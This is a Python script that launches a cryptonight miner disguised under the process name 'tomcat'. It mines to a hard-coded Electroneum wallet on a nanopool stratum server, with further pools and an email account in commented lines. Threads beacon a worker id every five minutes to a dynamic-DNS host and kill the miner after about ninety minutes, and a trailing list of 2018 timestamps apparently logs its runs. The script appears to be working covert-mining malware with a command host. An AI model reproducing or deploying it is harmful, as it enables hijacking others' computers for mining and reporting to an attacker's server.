import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:04.426635
#2018-02-17 16:38:07.255798
#2018-02-17 18:26:03.720881
#2018-02-17 20:14:05.177058
#2018-02-17 22:02:04.511750
#2018-02-17 23:46:03.893795
#2018-02-18 01:35:06.022775
#2018-02-18 03:22:03.681116
#2018-02-18 05:10:03.832823
#2018-02-18 07:02:06.832009
#2018-02-18 08:52:03.622937
#2018-02-18 10:38:07.338573
#2018-02-18 12:24:07.610481
#2018-02-18 14:12:03.952187
#2018-02-18 16:02:01.247925
#2018-02-18 17:52:04.305918
#2018-02-18 19:39:06.129467
#2018-02-18 21:24:05.105634
#2018-02-18 23:13:04.601820
#2018-02-19 00:59:06.303656
#2018-02-19 02:47:06.275081
#2018-02-19 04:33:04.527837
#2018-02-19 06:19:01.392266
#2018-02-19 08:06:06.536358
#2018-02-19 09:56:04.072081
#2018-02-19 11:46:04.517085
#2018-02-19 13:32:08.364757
#2018-02-19 15:20:09.218288
#2018-02-19 17:08:02.000306
#2018-02-19 18:57:01.963258
#2018-02-19 20:43:01.722201
#2018-02-19 22:32:04.695428
#2018-02-20 00:17:04.194565
#2018-02-20 02:05:01.362472
#2018-02-20 03:55:01.486209
#2018-02-20 05:40:07.148904
#2018-02-20 07:26:05.895431
#2018-02-20 09:11:06.025135
#2018-02-20 10:54:08.091662
#2018-02-20 12:42:08.665149
#2018-02-20 14:28:08.862912
#2018-02-20 16:14:08.255576
#2018-02-20 17:59:11.918541
#2018-02-20 19:52:05.579914
#2018-02-20 21:39:01.685209
#2018-02-20 23:22:07.074206
#2018-02-21 01:08:07.470720
#2018-02-21 02:55:03.633200
#2018-02-21 04:45:09.541262
#2018-02-21 06:35:03.082783
#2018-02-21 08:21:19.127226
#2018-02-21 10:07:04.721356
#2018-02-21 11:56:01.628841
#2018-02-21 13:46:09.527123
#2018-02-21 15:31:07.888759
#2018-02-21 17:21:01.242705
#2018-02-21 19:11:04.722635
#2018-02-21 21:59:07.102453
#2018-02-21 23:47:04.322831
#2018-02-22 01:36:06.796257
#2018-02-22 03:24:01.326775
#2018-02-22 05:13:03.464230
#2018-02-22 06:56:07.992454
#2018-02-22 08:45:06.195109
#2018-02-22 10:34:06.873471
#2018-02-22 12:20:04.676231
#2018-02-22 14:07:01.963019
#2018-02-22 15:54:06.683982
#2018-02-22 17:41:08.552712
#2018-02-22 19:28:05.071888
#2018-02-22 21:21:07.963304
#2018-02-22 23:07:04.844362
#2018-02-23 00:54:04.654570
#2018-02-23 02:41:06.595379
#2018-02-23 04:29:07.890754
#2018-02-23 06:16:08.287707
#2018-02-23 08:03:06.465273
#2018-02-23 10:20:01.487713
#2018-02-23 12:14:07.541834
#2018-02-23 14:01:08.534663
#2018-02-23 15:53:01.729447
#2018-02-23 17:38:06.646521
#2018-02-23 19:24:09.570296
#2018-02-23 21:09:06.315719
#2018-02-23 22:56:03.780751
#2018-02-24 00:43:08.870077
#2018-02-24 02:35:06.657677
#2018-02-24 04:28:03.721007
#2018-02-24 06:14:01.524480
#2018-02-24 08:02:05.620649
#2018-02-24 09:44:05.668726
#2018-02-24 11:41:03.820797
#2018-02-24 13:32:07.758303
#2018-02-24 15:20:07.858172
#2018-02-24 17:09:06.281217
#2018-02-24 19:00:11.078318
#2018-02-24 20:48:04.012622
#2018-02-24 23:05:01.416639
#2018-02-25 02:22:01.267132
#2018-02-25 05:43:03.915379
#2018-02-25 11:37:04.320256